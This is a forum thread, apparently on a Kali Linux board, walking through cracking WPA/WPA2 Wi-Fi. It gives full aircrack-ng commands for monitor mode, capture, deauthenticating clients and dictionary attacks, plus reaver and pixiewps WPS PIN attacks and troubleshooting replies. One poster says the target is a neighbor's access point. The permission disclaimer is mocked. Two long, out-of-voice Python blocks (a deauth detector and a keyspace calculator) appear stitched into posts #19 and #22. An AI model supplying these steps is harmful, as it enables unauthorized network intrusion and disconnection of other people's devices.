
Thread: Cracking a WPA/WPA2 wireless Access Point

  1. Cracking a WPA/WPA2 wireless Access Point

    Before going into the commands you need to type, you need to understand the basics of what you need to do. Here is what you need to do, in order (roughly):

    Create a monitoring device on your computer. Presuming you have a wireless adapter on your computer, you should be able to create a monitoring device. Not all devices can inject packets, however, which is very important.
    Search for wireless access points to crack into. Although you might be able to see an AP, you might not necessarily be able to sit between the router and a user, but running the following commands will determine that.
    Hone in on the specific AP. You need to get some specific information about the access point and who is connected to it. You need to do this to know who to listen in on. You're looking for the requests sent from the user to the router.
    Start logging the request hashes. Specifically the password hashes!
    Start a brute force attack. You need a password list file (or files) to do this. Get one!

    Don’t worry if you don’t understand all of the above, all will become apparent soon.

    Type:
    ifconfig

    Providing you get a result that says you have a wlan0, 1, 2, etc., you should be ok! If you have one that says mon0, 1, 2, etc., then skip the next step.

    Type:
    airmon-ng start wlan0

    This will create a monitoring device. Take note of what it’s called. Should be something like mon0, mon1 etc.

    Type:
    airodump-ng -c 6 mon0

    This will start a scan of everything you can see around you. Note that it’s using mon0 as the monitoring device and it’s on channel 6. Change these options as you see fit.

    Now this is the time to do some watching. You’re looking for a wireless connection that is WPA/WPA2 enabled. Note which channel it’s on and take a note of the MAC address.

    Type:
    airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w psk mon0

    Use the string above to start listening in on a specific AP. Again, change the channel, the MAC address and the monitoring device as you see fit.

    Now, this bit gets a bit complicated and cool at the same time. What you may (or may not) need to do is force users to send login requests to the router. You can do this by entering the AP MAC address and another user's MAC address into the following string.
    HINT: You can obtain a user's MAC address from the window we last used.

    Type:
    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

    Now, see the number 1 near the start? That isn't enough, I don't believe, to force a user's computer to send a login request to the router. However, I've been told it is. The truth is, if you change the '1' to '9999999' or some other ridiculous number then it's sure to work. However, you will completely block that user's connection to the internet... So, yeah. Do what you will with that command, and don't hold me responsible!!

    Anyway, by now you should have sufficient hashes for you to crack.

    Type:
    aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

    This will start a brute force password file attack and eventually produce a password you can use to connect to the router.

    I have not gone into great detail about what each little bit does and there is so much more you can do. This tutorial is just to get you started. If you want to know even more then go here to the lovely people who made this great product and check out their tutorials.

    Have fun! Oh, and only crack into wireless devices you manage or get permission from the owner! cough cough

  2. #2
    Hi MrShingles,
    I am wondering: what could be the reason for not catching the 4-way handshake when doing deauthentication with the -0 option? I checked the .cap file that I saved and it has EAPOL inside it but, for some unknown reason, airodump-ng wasn't able to see them. Do you have any guess how I could fix this?

  3. #3
    Failed attempt on my home wireless network on WPA with 1 handshake and using darkc0de.lst from teamctfu. It's a simple 14-letter passphrase of two merged words. After 1,144,730 keys tested, it reports "passphrase not in dictionary". Is there a better or longer dictionary out there, or do I need to collect more handshakes?

  4. #4
    We suggest you turn to the aircrack-ng forums for questions concerning cracking WPA through brute force methods.

  5. #5
    disregard.....
    Last edited by thepoor; 2014-02-24 at 18:03. Reason: fixed

  6. #6
    Sorry, but this does not work for me. I set up my router with the key 12345678, had my other laptop connected and got a handshake. aircrack-ng with darkc0de.lst did not find the key. I also tried cracking it with the WPA word list and nada.
    Where is the darn "any key" key?

  7. #7
    Well, I crunched my own 8-digit numeric wordlist and it found my key. I guess you have to try different wordlists and be patient to get it. Just like fishing.
    Where is the darn "any key" key?

  8. #8
    Try Reaver, which makes things easy; it doesn't depend on word lists, which are a long process with minimal success rates.

  9. #9
    I tried and I got the following:

    reaver -i mon0 -c 10 -b 00:00:00:00:00:00 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    Last edited by thepoor; 2014-03-02 at 20:16.
    Where is the darn "any key" key?

  10. #10
    Name Taken Guest
    Cracking at 500-1k passwords per CPU thread per second on a laptop with Aircrack-ng is not very efficient. If you have a Scrypt mining rig with 6 R9 290s, for example, that can crack at 900k passwords/second with oclHashcat. I have compiled my own wordlist from dozens of smaller ones, then stripped them using
    Code:
    grep -E '^[0-9a-zA-Z]{8,}$' dict_unique.txt > wordlist.stripped.txt

  11. #11
    To Name Taken

    Is there any chance that you could provide more details and expand on the following:

    Scrypt mining rig with 6 R9 290

    We are always interested in higher speeds

    MTA

  12. #12
    Name Taken Guest
    Quote Originally Posted by mmusket33 (quoting post #11 above)
    What specifically do you want to know? Scrypt is an alternative algorithm to SHA-256 that many cryptocurrencies use. Mining cryptocurrencies is very similar to password cracking. GPUs are significantly faster than CPUs.

  13. #13
    As Name Taken states, he was referring to mining rigs. Six R9 290s are about as powerful a rig as you can get nowadays. I also mine on reasonably powerful rigs and, with some help, would put my hash power towards password cracking for people here. I'm a new user to Kali and currently learning lots as I go, but keen to get involved.

    I have an HD7990 and 5970 that I could put towards cracking.
    Alternative Music & Video Producer with a keen interest in OPsec and Linux in general.

    Edinburgh, Scotland.

    http://zambianastronaut.com

  14. #14
    Hello everybody!

    I would like to capture encrypted frames, but I can't. Help me, please.
    I used the commands:

    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up

    airodump-ng --bssid 9c:d6:43:a8:9d:60 wlan0 -c 4 -w test2015 wlan0

    I just capture control frames: clear-to-send, ACK; and beacon frames.

    I would like to capture an encrypted bit stream, 1001110110101001, from data frames.... How can I do it?

    Thank you very much.

  15. #15
    Quote Originally Posted by henrique_luiz (quoting post #14 above)
    First of all, as he told you in the tutorial, you should use the monitor device (mon0) and not wlan0 in your "airodump-ng --bssid 9c:d6:43:a8:9d:60 wlan0 -c 4 -w test2015 wlan0" line.
    Second, I don't know why you put wlan0 twice in the same line.

    And third, when you put your wlan0 into monitor mode you don't need to down it; just use the following line:

    airmon-ng start wlan0 (this puts the device into monitor mode)

    Now you can sometimes see some info about processes that may disturb your monitor device; in my case it looks like this:

    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2589 NetworkManager
    2708 wpa_supplicant
    2736 dhclient
    3121 dhclient
    Process with PID 2736 (dhclient) is running on interface wlan0

    If you see this warning, just use the kill command like this:

    kill 2589

    and so on until all the processes are killed. (Sometimes it says a process doesn't exist, because when you kill one process another chain-reacts to that and closes automatically.)

    Now you're ready to move on to the airodump-ng line again, and this time use mon0, and only once.
    Last edited by squashen; 2015-02-05 at 00:30.

  16. #16
    Firstly, thank you squashen.
    I used the command "airmon-ng start wlan0" and killed the processes. Then I ran the command: "airodump-ng --bssid 9c:d6:43:a8:9d:60 -c 4 -w 05022015 mon0"
    Unfortunately the problem persists: I can capture only control frames and beacon frames.
    Thereafter, I tried using Kismet, but the same result occurred: it captures only control frames, QoS frames and beacon frames.
    I would like to capture encrypted data frames. Is it possible?

  17. #17
    Hey,

    after doing a lot of reading on this topic and messing with Kali quite a bit, I've decided to ask the more experienced guys..
    I am running Kali 1.0.9a 64-bit from USB.

    My goal is to crack a wifi password, obviously. I tried the built-in tool (with GUI.. can't remember the exact name as I have no reference).
    With attacks on WPS (reaver) I always get the 'failed to associate with... ' error.
    When I was trying airodump, I even failed to get a handshake. I also tried wifite, which is quite intuitive.. but also didn't have any success.

    Is there something I am doing wrong? I can repeat the process and take screenshots of all outputs... without the handshake, I cannot progress in any way.

    Also there are a few technical things that I was unable to look up.
    1. I understand that when the wifi adapter is in monitor (promiscuous) mode, it's able to listen to all the passing traffic. But how is it possible that Kali can interact (send commands) with the AP? It is not connected in any way.
    2. When sending deauth packets, what exactly happens to the clients? Do they get disconnected completely? Wouldn't that make (the slightly more educated ones) suspicious of what's going on? What if the AP that I am attacking doesn't have clients connected?
    3. OP mentions that the client's MAC address can be obtained from airodump-ng output.. which one is it? There's a BSSID and a station address displayed.
    4. I completely don't get the way wordlists work. I mean, what is the probability that the AP would have a password from a randomly generated wordlist?
    Is it not better to use, let's say, crunch to generate all combinations of lower case and upper case letters and numbers?

    Thanks a lot for the help
    And sorry for the lengthy post, I wanted to compile it into one post.. this has been driving me crazy for the past couple of days and I really want to make some progress.
    I am happy to provide any further details if needed.

  18. #18
    I read this PDF <www.kismetwireless.net/bsides/wifi_tools.pdf>, page 2: "If you're on a WPA protected network, you will only see packets destined to your device, and
    broadcasts." Ok. I know this because the GTK is the same for all stations. But to capture broadcast frames I need to have the password and be connected to the access point. I don't connect to the AP, but I want to collect the encrypted frames, the set of bits: ...10110100101110011010111001... Is it possible?

  19. #19
    Quote Originally Posted by Randall (quoting post #17 above)
    The answer to your first question can be one of the following:

    1. You are too far away from the AP (even if you have a signal, it's sometimes not enough for good communication. You may hear the router's signal, but don't forget that the router needs to hear you too).
    2. You are too close to the router (it's like reading a paper: you can't see the letters from a mile away, but you can't see the letters either if you press the paper against your eyes).
    3. Your wireless card doesn't support this kind of stuff.
    4. Sometimes reaver can have problems with the association; try using the -A option so reaver doesn't do the association, but if you do, you must use another association program like aireplay-ng with the -1 option.

    Your other questions:

    1. When you are associated with a router you have a kind of connection with the router and can talk to it, but you are not let in on the network yet (it's like knocking on someone's door and he opens it: you can talk to the person in the house, but he hasn't let you into the house yet).
    2. The deauth packet forces the client off the network. If the client has an auto-connect option enabled, he's online again in a few seconds if you only send one or a few packets; if you send like 50 packets, he's offline while the packets are being sent and tries to reconnect, and will do so when those 50 packets stop coming.
    What I have gathered is that the deauth packet is a warning sent to the AP that this client is not a valid client (not trusted, has sneaked in), and the AP directly kicks the client out to do a pass-control again before it lets him in (and that's what we want to happen if we want a handshake),
    and to do so we don't need to be inside the house to send the warning; it's enough to knock on the door and tell him when he opens the door (being associated).
    But what people often do when they don't get a handshake is send too few deauth packets to the AP; send about 30-40 so it really goes offline, and the clients need to have auto-connect enabled.

    3. The BSSID is the AP's MAC, and the station is a client and its MAC.
    In your pic you see 2 APs at the top; below you see a connection between one of the APs and a client (if you do an association to that AP, your MAC is going to show up there too),
    and the other AP has no clients connected, as far as you have found anyway.
    4. Wordlists were better before, when most routers had a password set by the owner, and that was often a known word which was easy to remember; if you just try well-known words, the brute-force time goes down drastically.

    Hope that clears up some of your questions, and sorry for my extremely bad English XD
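    A defender-side counterpart to the deauthentication step in the tutorial and to the mechanism squashen describes above, added here as an example that is not aircrack-ng's code: it decodes the 802.11 Frame Control field, counts deauthentication frames per transmitter so a burst like the one aireplay-ng -0 produces stands out in a capture, and counts Protected data frames (the encrypted frames henrique_luiz asks about). It assumes frames are raw 802.11 with any radiotap header already stripped; the capture slice and the threshold are constructed for the example.

```python
"""Classify raw 802.11 frames and flag a deauthentication burst.

Added example for this thread, not part of aircrack-ng. Frames are assumed to
be raw 802.11 with any radiotap header already stripped; the capture slice at
the bottom is constructed here and reuses the MACs from the tutorial.
"""
from collections import Counter

TYPE_NAMES = {0: "mgmt", 1: "ctrl", 2: "data"}
DEAUTH_FLOOD_THRESHOLD = 10   # deauths from one transmitter in one capture slice


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw):
    """Decode the Frame Control field and addresses of one 802.11 frame."""
    fc0, fc1 = raw[0], raw[1]
    ftype = (fc0 >> 2) & 0x3            # bits 2-3: type
    subtype = (fc0 >> 4) & 0xF          # bits 4-7: subtype
    info = {
        "type": TYPE_NAMES.get(ftype, "reserved"),
        "subtype": subtype,
        "protected": bool(fc1 & 0x40),              # flag bit 6: Protected Frame
        "qos": ftype == 2 and bool(subtype & 0x8),  # QoS data subtypes set bit 3
        "addr1": mac(raw[4:10]),
    }
    if ftype != 1:                      # control frames (ACK, CTS) carry only RA
        info["addr2"] = mac(raw[10:16])
        info["addr3"] = mac(raw[16:22])
    if ftype == 0 and subtype == 12:    # deauthentication: 2-byte reason code body
        info["reason"] = int.from_bytes(raw[24:26], "little")
    return info


def build_frame(ftype, subtype, a1, a2, a3, flags=0, body=b""):
    """Construct a minimal frame: FC, duration, three addresses, sequence control."""
    fc0 = (subtype << 4) | (ftype << 2)
    return bytes([fc0, flags, 0, 0]) + a1 + a2 + a3 + b"\x00\x00" + body


def summarize(frames, threshold=DEAUTH_FLOOD_THRESHOLD):
    """Count deauths per transmitter and protected data frames; flag bursts."""
    deauths = Counter()
    protected_data = 0
    for raw in frames:
        f = parse_frame(raw)
        if f["type"] == "mgmt" and f["subtype"] == 12:
            deauths[f["addr2"]] += 1
        elif f["type"] == "data" and f["protected"]:
            protected_data += 1         # the encrypted frames asked about in #23
    flood = {tx: n for tx, n in deauths.items() if n >= threshold}
    return {"deauth_by_tx": dict(deauths), "flood": flood,
            "protected_data": protected_data}


# Constructed capture slice using the tutorial's AP and client MACs.
AP = bytes.fromhex("00146c7e4080")
CLIENT = bytes.fromhex("000fb5fdfbc2")
BROADCAST = b"\xff" * 6
SAMPLE = [build_frame(0, 8, BROADCAST, AP, AP)]                    # beacon
SAMPLE += [build_frame(0, 12, CLIENT, AP, AP, body=b"\x07\x00")    # reason 7
           for _ in range(12)]                                     # burst "from" AP
SAMPLE += [bytes([0xD4, 0, 0, 0]) + AP]                            # ACK (control)
SAMPLE += [build_frame(2, 8, AP, CLIENT, AP, flags=0x41,           # QoS data, ToDS
                       body=b"\x00\x00" + b"\xaa" * 16)]           # + Protected

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

    On a real capture, feed the frames of each few-second window to summarize(); a legitimate AP rarely sends more than a handful of deauthentications per window, so a transmitter over the threshold is worth alerting on.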

  20. #20
    oh perfect. Thanks a lot! Definitely cleared some things up.

    I guess I will repeat the whole process and take screenshots so you know what's going on. I think the distance should be alright... it's my neighbor's AP in a flat. I usually get 3-4/5 signal strength.
    Is there a test to see if my wifi card is capable of this? I tried an injection test some time ago, but don't remember the output.

  21. #21
    Yeah, aireplay-ng -9 is one test (the injection test).
    Otherwise the thing you can do is check what other people say about your card in different forums; sometimes different cards work differently well with different drivers, and different programs with different libs.

  22. #22
    so just another update..
    I used wifite this time. I managed to finally get a handshake at least (it still took quite a long time). Not sure why the WPS attack failed, when WPS on the AP was enabled.
    One thing I am curious about is the size of crunch-generated wordlists.. do I need to have such massive free space on my disk? With a combination of lower and upper case letters and numbers, it would be 100s of TB.
    I am now trying to use pyrit to do this with my GPU... with my notebook's i5 CPU it would take ages.
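    To put numbers on the wordlist questions in posts #7, #10 and #22, an added example that is not part of crunch, pyrit or aircrack-ng: it computes the keyspace of a crunch -t pattern or charset, the on-disk size of the resulting wordlist, and the time needed to exhaust it at the guess rates quoted in post #10; min_length_for turns the same arithmetic around into the passphrase length to require on your own AP. The rates and the use of Python's punctuation set in place of crunch's symbol list are assumptions.

```python
"""Keyspace, wordlist size and exhaustion time for crunch-style candidates.

Added example for the thread above; not part of crunch, aircrack-ng or pyrit.
Pattern symbols follow crunch's -t syntax (@ lower-case, , upper-case,
% digit, ^ symbol); the guess rates are the figures quoted in post #10 and
are used here as assumptions, not measured numbers.
"""
import string

# Candidates per pattern position. The symbol set is Python's punctuation,
# a stand-in for crunch's own symbol list.
CHARSETS = {"@": 26, ",": 26, "%": 10, "^": len(string.punctuation)}
ALNUM = string.ascii_letters + string.digits            # 62 characters
RATES = {"cpu_thread": 1_000, "r9_290_x6": 900_000}      # guesses/s, post #10


def keyspace(pattern):
    """Candidates a crunch -t pattern expands to; literal characters count once."""
    n = 1
    for ch in pattern:
        n *= CHARSETS.get(ch, 1)
    return n


def charset_keyspace(charset, min_len, max_len):
    """Candidates for `crunch min_len max_len charset` (all lengths in range)."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def wordlist_bytes(candidates, length):
    """On-disk size of a plain wordlist: one newline-terminated line each."""
    return candidates * (length + 1)


def seconds_to_exhaust(candidates, rate):
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return candidates / rate


def min_length_for(charset_size, rate, years):
    """Smallest length whose keyspace outlasts `years` of guessing at `rate`/s.

    The defender's view: choose the passphrase length for your own AP from
    the attacker's assumed speed rather than from any wordlist.
    """
    budget = rate * years * 365 * 86400
    length = 1
    while charset_size ** length < budget:
        length += 1
    return length


def report(pattern, rate=RATES["cpu_thread"]):
    """Summary for one crunch pattern at one guess rate."""
    n = keyspace(pattern)
    return {"candidates": n,
            "disk_gib": wordlist_bytes(n, len(pattern)) / 2**30,
            "hours": seconds_to_exhaust(n, rate) / 3600}


if __name__ == "__main__":
    print(report("%%%%%%%%"))                 # post #7: 8-digit numeric list
    n62 = charset_keyspace(ALNUM, 8, 8)       # post #22: mixed 8-char space
    print(n62, wordlist_bytes(n62, 8) / 2**40, "TiB")
    print(min_length_for(62, RATES["r9_290_x6"], 10))
```

    The 8-digit list from post #7 is about 0.84 GiB and falls to a single CPU thread in roughly 28 hours, while the full 8-character alphanumeric space from post #22 is on the order of a thousand TiB on disk even before any cracking starts.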

  23. #23
    Hello, everybody!

    I learned from Nayanajith that QoS frames are encrypted data frames. Using Wireshark and the password, it is possible to decrypt frames collected with airodump.
    <http://mrncciew.com/2014/08/16/decrypt-wpa2-psk-using-wireshark>

    Thanks a lot!

  24. #24
    reaver -i mon0 -c 1 -b <mac> -S -N -a -vv -d 30 -r 3:15 -L -A
    This worked for me on a Linksys E1000; it found the WPS pin, which was '92489448'.
    We need to look into what wps-pin is doing, creating a database of WPS PIN numbers.

  25. #25
    I get neither wlan0 nor mon0 when typing ifconfig. I have eth0 and lo.

    Trying to start eth0 gives me :
    Code:
    root@kali01:~# airmon-ng start eth0
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID	Name
    2126	dhclient
    2419	NetworkManager
    Now keep in mind that I am completely new to this, but after some research I believe I have to buy a USB wireless adapter that supports packet injection?
    Could anyone confirm that or help me out in another way?

  26. #26
    Quote Originally Posted by Invictus (quoting post #25 above)
    I think you are using a virtual machine (if yes, then of course you need to buy a USB Wi-Fi card). And if not, then simply boot Kali from USB and then check; I'm sure it'll work fine...

  27. #27
    Hi,

    I would like to share something which I have tested and proven with 100% results:

    Please use wifite-mod-pixiewps; it cracks the PIN and reveals the WPA passphrase in less than 2 minutes.
    Here is the link: https://github.com/aanarchyy/wifite-mod-pixiewps . All the credit goes to aanarchyy and the team.

    How to install wifite-mod-pixiewps
    1. unzip the package
    2. copy the wifite-ng program to desktop
    3. Right-click on wifite-ng
    4. properties
    5. Permissions - check allow executing as a program
    6. close
    7. run and select open in terminal

    Please note:
    Make sure you have installed:
    1. reaver-wps-fork-t6x by t6x (https://github.com/t6x/reaver-wps-fork-t6x)
    2. Pixiewps by Wiire (https://github.com/wiire/pixiewps)

    You can also install the latest reaver and aircrack-ng via the terminal:
    1. apt-get update
    2. apt-get install reaver aircrack-ng
    This will install the latest aircrack version (no longer mon0, instead wlan0mon) and will also install reaver 1.5.2.

    Here is the link for reference https://www.kali.org/penetration-tes...ck-ng-updates/

    Always target a router whose signal is between 40 dB - 50 dB or more, not less than 20 dB (check in wifite when you run it).

    Happy Hacking.

    Cheers!
